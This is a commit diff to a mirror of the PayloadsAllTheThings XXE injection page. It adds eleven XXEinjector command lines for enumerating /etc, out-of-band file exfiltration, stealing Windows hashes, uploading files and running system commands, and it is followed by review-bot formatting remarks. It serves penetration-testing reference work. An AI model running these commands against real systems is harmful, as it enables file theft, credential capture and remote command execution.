mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git, synced 2024-12-24 05:15:26 +00:00
commit b25694239b
@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||||||
```
|
```
|
||||||
$ python3 230.py 2121
|
$ python3 230.py 2121
|
||||||
```
|
```
|
||||||
|
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||||
|
```bash
|
||||||
|
# Enumerating /etc directory in HTTPS application:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||||
|
# Enumerating /etc directory using gopher for OOB method:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||||
|
# Second order exploitation:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||||
|
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||||
|
# Enumerating using direct exploitation:
|
||||||
|
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||||
|
# Enumerating unfiltered ports:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||||
|
# Stealing Windows hashes:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||||
|
# Uploading files using Java jar:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||||
|
# Executing system commands using PHP expect:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||||
|
# Testing for XSLT injection:
|
||||||
|
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||||
|
# Log requests only:
|
||||||
|
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||||
|
```
|
||||||
|
|
||||||
## Detect the vulnerability
|
## Detect the vulnerability
|
||||||
|
|
||||||
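Review bot: the added XXEinjector entry never defines its inputs. `--file=/tmp/req.txt` and `--host=192.168.0.2` recur across the eleven invocations in the bash block, but nothing says what the request file has to contain or whose address the host value is. Add one sentence under the `- [XXEinjector](https://github.com/enjoiz/XXEinjector)` bullet that defines both, and mark 192.168.0.2 and the /tmp paths as placeholders. The bullet also lands directly after the `$ python3 230.py 2121` block with no heading or description separating the two tools; a one-line summary of what XXEinjector does would keep the section readable. Since the next heading is "Detect the vulnerability", a short remark that these modes depend on the parser resolving external entities and DTDs would tie the tool list to the text that follows.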
@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
|||||||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||||
|
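Review bot: the four reference entries in this hunk mix list markers, `*` on the first two and `-` on the last two; since the hunk already touches this block, normalise them to a single marker. Both sides of the hunk show identical text, so the change is presumably whitespace or an end-of-file newline only; if that is intended, say so in the commit message so the diff is not mistaken for a content edit.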